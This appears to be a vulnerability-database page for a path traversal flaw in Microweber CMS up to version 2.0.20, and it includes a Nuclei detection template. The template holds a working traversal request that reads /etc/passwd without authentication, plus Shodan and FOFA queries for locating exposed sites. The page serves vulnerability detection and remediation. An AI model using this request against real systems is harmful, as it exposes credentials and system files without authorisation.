/Vulnerability Library

Microweber CMS <= 2.0.20 - Unauthenticated Arbitrary File Read

CVE-2026-65694
Early Release

Description

Microweber CMS <= 2.0.20 contains a path traversal vulnerability caused by failure to normalize path query parameter in static file controller, letting unauthenticated remote attackers read arbitrary files.

Severity

High

CVSS Score

7.5

Exploit Probability

1%

Affected Product

microweber

Published Date

July 30, 2026

Template Author

0x_akoko, abdugafforov-bobur

CVE-2026-65694.yaml
id: CVE-2026-65694

info:
  name: Microweber CMS <= 2.0.20 - Unauthenticated Arbitrary File Read
  author: 0x_Akoko,abdugafforov-bobur
  severity: high
  description: |
    Microweber CMS <= 2.0.20 contains a path traversal vulnerability caused by failure to normalize path query parameter in static file controller, letting unauthenticated remote attackers read arbitrary files.
  impact: |
    Unauthenticated attackers can read sensitive files, potentially exposing credentials and system information.
  remediation: |
    Update to the latest version beyond 2.0.20.
  reference:
    - https://github.com/abdugafforov-bobur/CVE-2026-65694-PoC
    - https://nvd.nist.gov/vuln/detail/CVE-2026-65694
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-65694
    epss-score: 0.00793
    epss-percentile: 0.52743
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    vendor: microweber
    product: microweber
    shodan-query: http.html:"microweber"
    fofa-query: body="microweber"
  tags: cve,cve2026,microweber,lfi

http:
  - raw:
      - |
        GET /userfiles/x?path=../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "root:x:0:0")'
        condition: and
# digest: 4a0a00473045022031f5bee5fe860b67df4a35820c6bb54335fb768b74eb87b0a2e6b2313bef7ef4022100c228e6a5e9d902c03bde036d7110ed52d3f514979e6ddc95a1f61106e4f55213:922c64590222798bb761d5b6d8e72950
7.5Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2026-65694
CWE ID:
cwe-22

References

https://github.com/abdugafforov-bobur/CVE-2026-65694-PoChttps://nvd.nist.gov/vuln/detail/CVE-2026-65694

Remediation Steps

Update to the latest version beyond 2.0.20.